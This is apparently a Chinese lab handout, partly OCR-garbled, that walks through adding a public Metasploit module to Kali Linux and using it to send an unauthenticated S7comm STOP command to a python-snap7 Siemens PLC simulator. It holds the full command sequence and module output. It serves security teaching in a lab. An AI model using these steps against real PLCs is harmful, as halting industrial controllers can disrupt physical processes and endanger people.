《工业互联网安全测试技术:协议测试.docx》由会员分享,可在线阅读,更多相关《工业互联网安全测试技术:协议测试.docx(9页珍藏版)》请在taowenge.com淘文阁网|工程机械CAD图纸|机械工程制图|CAD装配图下载|SolidWorks_CaTia_CAD_UG_PROE_设计图分享下载上搜索。
1、系统2协议测试实验文档实验原理首先在Ubuntu VM上安装一个用Python实现的西门子S7 PLC模拟器。然 后通过kali liunx对S7comm协议进行测试,并对Siemens PLC中存在一个已 知的特征/漏洞,攻击者可以远程停止S7 PLCo 实验目的使用kali linux测试S7comm协议,利用Siemens PLC中存在的一个 的特征/漏洞,对我们构造的S7 PLC模拟器进行攻击,使S7 PLC停止工作。 实验环境Kali Linux虚拟机(环境自带)Ubuntu VM推荐课时数:2课时实验步骤S7通信S7comm协议不是PROFINET标准的直接局部,但通常在工厂的同一
2、 区域或在同一 ICS网络上使用。S7comm (S7Communication)是西门子的专有协 议,它允许PLC或可编程逻辑控制器与编程终端之间的通信。它为PLC编程, 多个PLC之间的通信,或SCADA (即监控和数据采集)系统与PLC之间的通信 提供了便利。S7comm协议运行在COTP (即面向连接的传输协议)之上,COTP 是ISO协议族的连接传输协议。鉴于S7comm协议的广泛使用,Siemens PLC中存在一个的特征/漏洞, 攻击者可以远程停止S7 PLCo让我们来看看对这个漏洞的攻击是如何发生的。 该漏洞利用程序具有最新的利用数据库,它安装在Kali Linux VM上。那
3、么, 让我们来搜索一下这个漏洞:步骤一:在 Kali Linux 中搜索Siemens Simatic S7漏洞(1) Kali linux虚拟机安装OpenPLC,在终端输入命令searchsploit Siemens Simatic S7,得到页面如下列图 1 所示:“桌面Isearchsploit *Siemens Simatic S7Path1200-1200-1200-1200-1500-CPU Command Module (Metas -CPU START/STOP Module (Me CPU - Cross-Site Request Fo CPU - Cross-Site S
4、cripting CPU - Remote Denial of Serv-300 - PLC Remote Memory Viewer ( -300 CPU - Remote Denial of Servi -300/400 - CPU START/STOP Modulehardware/remote/38964.rb hardware/remote/19833 . rb linux/webapps/44667.txt linux/webapps/44687.txt Iinux/dos/44693.pyhardware/remote/19832 . rb Iinux/dos/44802 . p
5、yhardware/remote/19831.rbShellcodes: No Results图1漏洞搜索(2)在终端输入命令cat/usr/share/exploitdb/exploits/hardware/remote/19831. rb ,得到页面如下图2所示:,/桌面cat /usr/uha/s/exDloitdb/exDloits/hasdware/remote/19831. rbttnExploit Title: Siemens Simatic S7 300/400Date: 7-13-2012Exploit Author: Dillon BeresfordVendor Homep
6、age: Tested on: Siemens Simatic S7-300 PLC CVE : NoneCPU command modulerequire msf/coreclass Metasploit3 Siemens SimaticDescription= %qThe SiemensS7-300/400 CPU START/STOP Module,Simatic S7-300/400 S7 CPU start and stop functions over ISO-TSAPthis ive commands without authentication.Thismodules allo
7、ws an attacker to perform administratmodule allows a remote user to change the state of the PLC betweenSTOPand START, allowing an attacker to end process control by the PLC., Author License References=Dillon Beresford, =MSF_LICENSE,URL, :/imwv.us-cert.gov/control_systems/pdf/ICS-ALERT-11-186-01.pdf
8、*URL, ms/pdf/ICS-ALERT-11-161-01.pdf, VersionDisclosureDate )=$Revision$, May 09 2011,Exploit Titleregister_options(Opt ::RPORT(102),Optint.new(MODE, false, Set true to put the CPU图2查看文件(l)Metasploit已经包含了大量的漏洞,然而,Siemens漏洞需要添加进去。由 于编写这个exp时考虑了使用Metasploit,所以这是一项简单的任务。要添加模块,请进入/.msf4/modules目录下,在命令窗口
9、下输入 cd / msf4/modules在该目录下创立一个文件,在命令窗口下输入 mkdir -p auxi1iary/hardware/scada(3)将19831. rb文件复制到我们创立的目录下,在命令窗口中输入命令cp /usr/share/exploitdb/exploits/hardware/remote/19831. rb/ msf4/modules/auxi1iary/hardware/scada(4)开启服务,在在命令窗口中输入命令,service postgresql start(5)为适应使用更新的Metasploit框架,我们需要在19831. rb文件中更改同样的代
10、码。看一下文件中的第29行:R/root/.msf4/modules/auxiliAry/hardware/scada/19831.rb Mousepad文件(F)编第(E)搜索(S)视图(V)文档(D)帚助(H) 望告:您正在使用root帐户。有可能会损害您的系统。卜 Exploit Title: Siemens Simatic S7 300/400 CPU command module # Date: 7-13-2012 # Exploit Author: Dillon Beresford 料 Vendor Homepage: :/wmh.siemens / # Tested on: Si
11、emens Simatic S7-300 PLC # CVE : Nonerequire msf/coreMetasploit3 Siemens Simatic S7-300/400 CPU START/STOP Module, Description* =The Siemens Simatic S7-300/400 S7 CPU start and stop functions over ISO-TSAP this modules allows an attacker to perform administrative commands without authentication. Thi
12、s module allows a remote user to change the state of the PLC between STOP and START, allowing an attacker to end process control by the PLC.9Author= Dillon BeresfordtLicense= MSF一LICENSE,References = URL, : us-cert.gov/control_systems/pdf/ICS-ALERT-ll-186-01.pdf,URL, :/vmh .us-cert.gov/control_syste
13、ms/pdf/ICS-ALERT-ll-161-01.pdf, , Version = SRevisionl, DisclosureDate* n May 09 2011, )register options( 0口叫102).I Optlnt.newiMODE, tase, Mode 1 to Stop CPU. Set Mode to 2 to put the CPU back into RUN node.,1). OptInt.newCCYCLES,Itrue,Set the amount of CPU STOP/RUN cycles.,10J), .class)图3代码修改将19831
14、. rb文件中的第29行代码改为如上图3红框中的形式。脚本确定后,现在我们可以继续利用过程:在命令窗口中输入如下代码,Msfconsole得到的结果如下列图4所示:0*/.msf4/modulesI。 msfconsole! The following modules could not be loaded! . |! /usr/share/metasploit-framework/modules/auxiliary/gather/office365userenum.py! Please see /root/.msf4/logs/framework.log for details.! The
15、following modules were loaded with warnings:! /root/.msf4/modules/auxiliary/hardware/scada/19831.rb! Please see /root/.msf4/logs/framework.log for details.MMMMMMMMPlPiPlPlPlPlPlFiMMMMMMMMMMMMpunpipipipipipipiiuwii,uiPiiwiPifBiwiPIPIPI PUHPWHPIPIPIPIPIPIFI PlPlPlPi=+ = 2099 exploits - 1129 auxiliary
16、- 357 post+ = 592 payloads - 45 encoders - 10 nops+ = 7 evasionMetasploit tip: Tired of setting RHOSTS for modules? Try globally setting it with 图4开启msf开启msf后,我们依次输入以下命令,reload_allsearch siemens得到的结果如下列图5所示:msf6 reload_allI* Reloading modules from all module paths .WARNING! The following modules cou
17、ld not be loaded!/usr/share/metasploit-framework/modules/auxiliary/gather/office365userenum.py/usr/share/metasploit-framework/modules/auxiliary/dos/ /slowloris.py/usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/exchange_enum go/usr/share/metasploit-framework/modules/auxiliary/scanner
18、/msmail/onprem_enum.g o/usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/host_id.go/usr/share/metasploit-framework/modules/auxiliary/scanner/ssl/bleichenbacher_o racle.pyPlease see /root/.msf4/logs/framework.log for details.! The following modules were loaded with warnings:! /root/.ms
19、f4/modules/auxiliary/hardware/scada/19831.rb! Please see /root/.msf4/logs/framework.log for details.上 上上, 斤斤斤,jtt ft tt tttt WAVE 5SCORE 31337HIGH FFFFFFFF tt=msf6 search siemensMatching ModulesttNameDisclosureDateRankCheck Description0 auxiliary/dos/scada/iemen_siprotec4NoSiemens SIPROTEC 4 and SIP
20、ROTEC Compact EN100 Ethernet Module -normalDenial of Service1 auxiliary/gather/ipcamera_password_disclosure2016-08-16normalNoJVC/Siemens/Vanderbilt IP-Camera Readfile Password Disclosure2 auxiliary/scanner/scada/profinet.siemensnormalNoSiemens Profinet Scanner3 exploit/windows/browser/sapgui_savevie
21、wtosessionfile2009-03-31normalNoSAP AG SAPgui EAI WebViewer3D Buffer Overflow4 exploit/windows/browser/iemens_solid_edge_selistctrlx 2013-05-26normalNoSiemens Solid Edge ST4 SEListCtrlX ActiveX Remote Code Execution5 exploit/windows/scada/factorylink_csservice2011-03-25normalNoSiemens FactoryLink 8
22、CSService Logging Path Param Buffer Overflow6 explort/windows/scada/factorylink_vrn_092011-03-21averageNoSiemens FactoryLink vrn.exe Opcode 9 Buffer Overflow7 exploit/windows/smtp/njstar_smtp_bof2011-10-31normalYes NJStar Communicator 3.00 MiniSMTP Buffer Overflow8 auxiliary/hardware/scada/198312011
23、-05-09normalNoSiemens Simatic S7-300/400 CPU START/STOP ModuleInteract with a module by name or index. For example info 8, use 8 or use auxiliary/ha图5模块重载此时,利用模块添加完成,可以通过输入以下命令开始使用:use auxiliary/hardware/scada/19831show info得到的结果如下列图6所示:msf6 use auxiliary/hardware/scada/19831msf6 auxiliary() show in
24、foName: Siemens Simatic S7-300/400 CPU START/STOP Module Module: auxiliary/hardware/scada/19831License: Metasploit Framework License (BSD)Rank: NormalDisclosed: 2011-05-09Provided by:Dillon BeresfordCheck supported: NoBasic options:NameCurrent SettingRequiredDescriptionCYCLES10yesSetthe amount of CP
25、U STOP/RUN cycles.MODE1noMode- 1 to Sitop CPU. Set Mode to 2 to put the CPUback intoRUN mode.RHOSTSyesThetargethost(s)r range CIDR identifier, orhosts file with syntax file:,RPORT102yesThetargetport (TCP)THREADS1yesThenumberof concurrent threads (max one perhost)Description:The Siemens Simatic S7-30
26、0/400 S7 CPU start and stop functions over ISO-TSAP this modules allows an attacker to perform administrative commands without authentication. This module allows a remote user to change the state of the PLC between STOP and START, allowing an attacker to end process control by the PLC.References: :/
27、vaww .us-cert.gov/control_systems/pdf/ICS-ALERT-l1-186-01.pdf :/vaw/ .us-cert.gov/control_systems/pdfZlCS-ALERT-ll-161-01.pdf图 6 show info步骤二:创立Ubuntu VM,安装通过python实现的S7 PLC(1)模块在Metasploit中加载,但是在开始攻击之前,首先需要一个目标。现在, 我们不需要花钱买西门子PLC,而是要在之前创立的Ubuntu VM上安装一个 用Python实现的西门子S7 PLC模拟器。下载最新版本的snap732/64位多平 台
28、以太网 S7 PLC 通信套件,下载地址为 . net/projects/snap7/files/,提取/tmp/snap7-full/ 中的文件。然后,按照如下说明,在命令窗口中输入如下命令:cd snap7-full-l. 4. 1sudo apt install python3-pipsudo pip install python-snap7 cd build/unixmake -f x86_64_linux. mkcd ./bin/x86 64-linux/sudo cp libsnap7. so /usr/lib/sudo Idconfigsudo python3得到如下列图7的结果
29、::?ysyy-vtrtu import snap7 s7server = snap7.server.Server() s7.server.create()Traceback (most recent call last):File , line 1, in NameError: name s7 is not defined s7server.create() s7seve,stat()图8开启s7server(3)验证新创立的PLC服务器的状态,在命令行窗口中输入:s7server. get_status()得到的结果如下列图9所示: s7serverget_status()(SrvRunn
30、ing1, S7CpuStatusRun , 0)图9查询s7状态步骤三:在kali linux中利用漏洞攻击(1)继续我们在Kali Linux机器上的工作,使用以下工具,在命令行窗口中输入:show options得到如下列图10的结果:msf6 auxiliary() show optionsModule options (auxiliary/hardware/scada/19831):NameCurrent SettingRequiredDescriptionCYCLES10yesSet the amount of CPU STOP/RUNcycles.MODE1noMode 1 to
31、 Stop CPU. Set Mode to2 to put the CPU back intoRUN mode.RHOSTSyesThe target host(s)f range CIDRidentifier, orhosts file with syntax ,file:,RPORT102yesThe target port (TCP)THREADS1yesThe number of concurrent threads (max one perhost)图 10 show options(2)我们需要设置的唯一变量是RHOSTS。将其设置为Ubuntu VM的IP地址192. 168.
32、 17. 135,然后使用命令exploit运行漏洞,在命令行窗口中输入:set RHOSTS 192.168. 17. 135exploit得到如下列图11的结果:msf6 auxiliary() RHOSTS = 19216817.135msf6 auxiliary( r /) exploit+ 192.168.17.135:102- 192.168.17.135 PLC is running, iso-tsap port is open.* 192.168.17.135:102- Scanned 1 of 1 hosts (100% complete)* Auxiliary module
33、 execution completed图n设置参数(3)在Ubuntu虚拟机上查看S7 PLC模拟器的状态,在Ubuntu虚拟机的命令 行中输入命令:s7server. get_status()得到的结果如图12所示: s7servereget_status()(SrvRunning1, 1S7CpuStatusStop1, 0)图12查询s7server状态PROF I NET和大多数其他ICS协议都不包含使用身份验证的功能。任何人只要使 用正确的工具且知道PLC的地址,都可以发送这个停止命令。用于查找16进制 值的停止命令序列的方法与我们在前面的练习中查找用于发现本地网络附加节 点的命令的方法非常相似。它归结为观察编程工作站与PLC或终端设备之间的 通信。